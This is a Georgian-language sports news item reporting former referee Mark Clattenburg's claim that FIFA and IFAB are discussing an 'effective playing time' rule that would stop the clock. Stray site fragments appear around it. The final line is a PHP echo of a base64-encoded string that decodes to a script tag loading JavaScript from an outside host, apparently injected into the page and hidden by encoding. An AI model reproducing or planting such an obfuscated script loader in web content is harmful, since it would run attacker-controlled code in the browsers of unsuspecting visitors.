celsiusi
ავერსი საქკაბელი
ფეხბურთის ასოციაციათა საერთაშორისო ფედერაცია (FIFA) და ფეხბურთის ასოციაციათა ​საერთაშორისო საბჭო (IFAB) ფეხბურთის წესების შეცვლაზე მსჯელობენ. ამის შესახებ ყოფილმა მსაჯმა, მარკ კლატენბურგმა განაცხადა.
 
მისი თქმით, IFAB-ი და FIFA-ს სამსაჯო კომიტეტის ხელმძღვანელი პიერლუიჯი კოლინა ფეხბურთში „სუფთა დროის“ წესის შემოღებაზე მსჯელობენ. „სუფთა დროის“ წესი ფუტზალში, კალათბურთში და სპორტის სხვა სახეობებში მოქმედებს და ითვალისწინებს წამზომის გაჩერებას, როდესაც ბურთი მოედნის ფარგლებს ტოვებს, ფეხბურთელი ტრავმას იღებს და მატჩი გაჩერებულია.
 
ამ წესის დამტკიცების შემთხვევაში მატჩის სათამაშო დრო, შესაძლოა, 90-დან 60 წუთამდე შემცირდეს.
 
მარკ კლატენბურგის განცხადებით, ინგლისის პრემიერლიგის მიმდინარე სეზონში მატჩის „სუფთა დრო“ (თამაშში ბურთის ყოფნის დრო) საშუალოდ 55 წუთი და 3 წამი იყო, ზოგ შემთხვევაში კი 41 წუთსაც შეადგენდა.
 
 
854
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");